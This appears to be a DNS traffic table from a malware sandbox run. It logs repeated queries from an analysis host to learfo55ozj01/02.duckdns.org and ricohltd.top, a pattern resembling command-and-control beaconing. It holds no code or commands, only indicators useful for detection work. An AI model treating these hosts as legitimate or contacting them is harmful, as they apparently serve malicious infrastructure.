                                              May 1, 2024 18:22:59.929601908 CEST192.168.2.228.8.8.80xfb49Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:00.024713993 CEST192.168.2.228.8.8.80xfb49Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:00.119863033 CEST192.168.2.228.8.8.80xfb49Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:00.214356899 CEST192.168.2.228.8.8.80xfb49Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:00.310405970 CEST192.168.2.228.8.8.80xfb49Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:05.083590031 CEST192.168.2.228.8.8.80x2e2dStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:05.178329945 CEST192.168.2.228.8.8.80x2e2dStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:05.272712946 CEST192.168.2.228.8.8.80x2e2dStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:05.367305994 CEST192.168.2.228.8.8.80x2e2dStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:05.462238073 CEST192.168.2.228.8.8.80x2e2dStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:05.567436934 CEST192.168.2.228.8.8.80xacb5Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:05.662013054 CEST192.168.2.228.8.8.80xacb5Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:05.756330967 CEST192.168.2.228.8.8.80xacb5Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:05.851262093 CEST192.168.2.228.8.8.80xacb5Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:05.945580006 CEST192.168.2.228.8.8.80xacb5Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:06.050112009 CEST192.168.2.228.8.8.80xf039Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:06.147231102 CEST192.168.2.228.8.8.80xf039Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:06.247243881 CEST192.168.2.228.8.8.80xf039Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:06.343262911 CEST192.168.2.228.8.8.80xf039Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:06.442270994 CEST192.168.2.228.8.8.80xf039Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:08.993493080 CEST192.168.2.228.8.8.80xcccdStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:09.105727911 CEST192.168.2.228.8.8.80xcccdStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:09.200263023 CEST192.168.2.228.8.8.80xcccdStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:09.298962116 CEST192.168.2.228.8.8.80xcccdStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:09.420037985 CEST192.168.2.228.8.8.80xcccdStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:10.218755960 CEST192.168.2.228.8.8.80x63a1Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:10.733387947 CEST192.168.2.228.8.8.80xa3d9Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:10.828233004 CEST192.168.2.228.8.8.80xa3d9Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:10.922938108 CEST192.168.2.228.8.8.80xa3d9Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:11.017905951 CEST192.168.2.228.8.8.80xa3d9Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:11.119092941 CEST192.168.2.228.8.8.80xa3d9Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:12.362782955 CEST192.168.2.228.8.8.80x8656Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:12.476284027 CEST192.168.2.228.8.8.80x8656Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:12.574835062 CEST192.168.2.228.8.8.80x8656Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:12.687738895 CEST192.168.2.228.8.8.80x8656Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:12.951582909 CEST192.168.2.228.8.8.80x8656Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:16.644519091 CEST192.168.2.228.8.8.80xd33eStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:16.740267038 CEST192.168.2.228.8.8.80xd33eStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:16.839495897 CEST192.168.2.228.8.8.80xd33eStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:16.934931993 CEST192.168.2.228.8.8.80xd33eStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:17.030488968 CEST192.168.2.228.8.8.80xd33eStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:17.136998892 CEST192.168.2.228.8.8.80x636cStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:17.231513977 CEST192.168.2.228.8.8.80x636cStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:17.329366922 CEST192.168.2.228.8.8.80x636cStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:17.425553083 CEST192.168.2.228.8.8.80x636cStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:17.522459030 CEST192.168.2.228.8.8.80x636cStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:18.642189026 CEST192.168.2.228.8.8.80xd9a9Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:18.737210989 CEST192.168.2.228.8.8.80xd9a9Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:18.832145929 CEST192.168.2.228.8.8.80xd9a9Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:18.927398920 CEST192.168.2.228.8.8.80xd9a9Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:19.023443937 CEST192.168.2.228.8.8.80xd9a9Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:19.128278017 CEST192.168.2.228.8.8.80x69cbStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:19.223498106 CEST192.168.2.228.8.8.80x69cbStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:19.318104982 CEST192.168.2.228.8.8.80x69cbStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:19.412940025 CEST192.168.2.228.8.8.80x69cbStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:19.507874966 CEST192.168.2.228.8.8.80x69cbStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:19.631625891 CEST192.168.2.228.8.8.80xad0Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:19.727283955 CEST192.168.2.228.8.8.80xad0Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:19.822412014 CEST192.168.2.228.8.8.80xad0Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:19.924750090 CEST192.168.2.228.8.8.80xad0Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:20.023053885 CEST192.168.2.228.8.8.80xad0Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:22.912683964 CEST192.168.2.228.8.8.80x13e0Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:23:23.551987886 CEST192.168.2.228.8.8.80x5d38Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              May 1, 2024 18:20:41.348900080 CEST8.8.8.8192.168.2.220x6bc6No error (0)ricohltd.top104.21.60.38A (IP address)IN (0x0001)false
                                              May 1, 2024 18:20:41.348900080 CEST8.8.8.8192.168.2.220x6bc6No error (0)ricohltd.top172.67.191.112A (IP address)IN (0x0001)false
                                              May 1, 2024 18:20:43.777667999 CEST8.8.8.8192.168.2.220xa811No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:20:45.729424000 CEST8.8.8.8192.168.2.220x5a61No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:20:46.326531887 CEST8.8.8.8192.168.2.220x926Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:20:47.459662914 CEST8.8.8.8192.168.2.220x3c88No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:20:48.139242887 CEST8.8.8.8192.168.2.220xb917No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:20:48.850656033 CEST8.8.8.8192.168.2.220xf356Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:20:50.892533064 CEST8.8.8.8192.168.2.220xbaf4No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:20:52.240302086 CEST8.8.8.8192.168.2.220x8554No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:20:53.315177917 CEST8.8.8.8192.168.2.220xf3dbName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:20:57.623327971 CEST8.8.8.8192.168.2.220x82a1No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:20:59.550465107 CEST8.8.8.8192.168.2.220xdaa0No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:00.109519005 CEST8.8.8.8192.168.2.220xdc3eName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:01.629203081 CEST8.8.8.8192.168.2.220x8e67No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:05.282814980 CEST8.8.8.8192.168.2.220xfe4No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:05.813594103 CEST8.8.8.8192.168.2.220x8e4aName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:06.974354029 CEST8.8.8.8192.168.2.220x9bc3No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:07.609211922 CEST8.8.8.8192.168.2.220x3b6dNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:08.600152016 CEST8.8.8.8192.168.2.220xeb60Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:13.444186926 CEST8.8.8.8192.168.2.220x4da1No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:14.332699060 CEST8.8.8.8192.168.2.220xe616No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:15.057497025 CEST8.8.8.8192.168.2.220xcddaName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:16.237462997 CEST8.8.8.8192.168.2.220xcd33No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:18.623866081 CEST8.8.8.8192.168.2.220x824No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:19.814316034 CEST8.8.8.8192.168.2.220xc36fName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:20.993757963 CEST8.8.8.8192.168.2.220x2a2aNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:21.721213102 CEST8.8.8.8192.168.2.220x3ec0No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:22.313657045 CEST8.8.8.8192.168.2.220xa135Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:23.595305920 CEST8.8.8.8192.168.2.220xfa11No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:24.355746984 CEST8.8.8.8192.168.2.220x9408No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:25.222199917 CEST8.8.8.8192.168.2.220x6b16Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:27.282159090 CEST8.8.8.8192.168.2.220xaf81No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:28.279517889 CEST8.8.8.8192.168.2.220xa7f7No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:29.008239031 CEST8.8.8.8192.168.2.220x2622Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:30.260442019 CEST8.8.8.8192.168.2.220x4f21No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:30.973165989 CEST8.8.8.8192.168.2.220x8564No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:31.565931082 CEST8.8.8.8192.168.2.220x6e3eName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:32.755573988 CEST8.8.8.8192.168.2.220xb4c3No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:33.427191973 CEST8.8.8.8192.168.2.220x5c79No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:34.016827106 CEST8.8.8.8192.168.2.220xe4bcName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:34.112034082 CEST8.8.8.8192.168.2.220xe4bcName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:35.283551931 CEST8.8.8.8192.168.2.220xfaabNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:36.047956944 CEST8.8.8.8192.168.2.220x9d52No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:36.760205984 CEST8.8.8.8192.168.2.220xaf03Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:38.201294899 CEST8.8.8.8192.168.2.220xc6c8No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:38.868854046 CEST8.8.8.8192.168.2.220xf123No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:38.964133024 CEST8.8.8.8192.168.2.220xf123No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:39.573415041 CEST8.8.8.8192.168.2.220xa88Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:40.775657892 CEST8.8.8.8192.168.2.220x6a7fNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:41.551778078 CEST8.8.8.8192.168.2.220x985bNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:42.256622076 CEST8.8.8.8192.168.2.220x861cName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:43.440057993 CEST8.8.8.8192.168.2.220x2535No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:43.535567045 CEST8.8.8.8192.168.2.220x2535No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:44.391361952 CEST8.8.8.8192.168.2.220xf98bNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:45.033880949 CEST8.8.8.8192.168.2.220x3e71Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:46.245449066 CEST8.8.8.8192.168.2.220x2b92No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:46.840233088 CEST8.8.8.8192.168.2.220xb9b0No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:47.811669111 CEST8.8.8.8192.168.2.220xcd88Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:48.995340109 CEST8.8.8.8192.168.2.220xa656No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:49.967490911 CEST8.8.8.8192.168.2.220xcc8aNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:50.062179089 CEST8.8.8.8192.168.2.220xcc8aNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:50.742985010 CEST8.8.8.8192.168.2.220x5044Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:52.162982941 CEST8.8.8.8192.168.2.220x90bNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:52.257852077 CEST8.8.8.8192.168.2.220x90bNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:52.370883942 CEST8.8.8.8192.168.2.220x90bNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:52.465672970 CEST8.8.8.8192.168.2.220x90bNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:53.583726883 CEST8.8.8.8192.168.2.220xb3aeNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:53.694154978 CEST8.8.8.8192.168.2.220xb3aeNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:53.788830042 CEST8.8.8.8192.168.2.220xb3aeNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:53.883375883 CEST8.8.8.8192.168.2.220xb3aeNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:53.978255987 CEST8.8.8.8192.168.2.220xb3aeNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:55.659858942 CEST8.8.8.8192.168.2.220x7d0eNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:55.773397923 CEST8.8.8.8192.168.2.220x7d0eNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:55.868273973 CEST8.8.8.8192.168.2.220x7d0eNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:55.963732958 CEST8.8.8.8192.168.2.220x7d0eNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:56.058453083 CEST8.8.8.8192.168.2.220x7d0eNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:00.129159927 CEST8.8.8.8192.168.2.220x736bNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:00.223520994 CEST8.8.8.8192.168.2.220x736bNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:00.318231106 CEST8.8.8.8192.168.2.220x736bNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:00.412965059 CEST8.8.8.8192.168.2.220x736bNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:00.507369041 CEST8.8.8.8192.168.2.220x736bNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:01.206665993 CEST8.8.8.8192.168.2.220x2d06No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:01.301999092 CEST8.8.8.8192.168.2.220x2d06No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:01.400314093 CEST8.8.8.8192.168.2.220x2d06No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:01.518507004 CEST8.8.8.8192.168.2.220x2d06No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:02.678601027 CEST8.8.8.8192.168.2.220x6ec5Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:02.778820992 CEST8.8.8.8192.168.2.220x6ec5Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:02.874051094 CEST8.8.8.8192.168.2.220x6ec5Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:02.969626904 CEST8.8.8.8192.168.2.220x6ec5Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:07.701328993 CEST8.8.8.8192.168.2.220x8febNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:07.797184944 CEST8.8.8.8192.168.2.220x8febNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:07.894224882 CEST8.8.8.8192.168.2.220x8febNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:07.989653111 CEST8.8.8.8192.168.2.220x8febNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:08.088238955 CEST8.8.8.8192.168.2.220x8febNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:08.284466028 CEST8.8.8.8192.168.2.220xb346Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:08.379765987 CEST8.8.8.8192.168.2.220xb346Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:08.474997997 CEST8.8.8.8192.168.2.220xb346Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:08.570108891 CEST8.8.8.8192.168.2.220xb346Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:08.664791107 CEST8.8.8.8192.168.2.220xb346Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:10.061156988 CEST8.8.8.8192.168.2.220x2679No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:10.157847881 CEST8.8.8.8192.168.2.220x2679No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:10.257924080 CEST8.8.8.8192.168.2.220x2679No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:10.352734089 CEST8.8.8.8192.168.2.220x2679No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:10.447464943 CEST8.8.8.8192.168.2.220x2679No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:10.552036047 CEST8.8.8.8192.168.2.220x6989No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:10.646538973 CEST8.8.8.8192.168.2.220x6989No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:10.740927935 CEST8.8.8.8192.168.2.220x6989No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:10.837960005 CEST8.8.8.8192.168.2.220x6989No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:10.933314085 CEST8.8.8.8192.168.2.220x6989No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:12.589507103 CEST8.8.8.8192.168.2.220x792dNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:12.685379982 CEST8.8.8.8192.168.2.220x792dNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:12.782250881 CEST8.8.8.8192.168.2.220x792dNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:12.879131079 CEST8.8.8.8192.168.2.220x792dNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:12.973751068 CEST8.8.8.8192.168.2.220x792dNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:14.743668079 CEST8.8.8.8192.168.2.220x978cNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
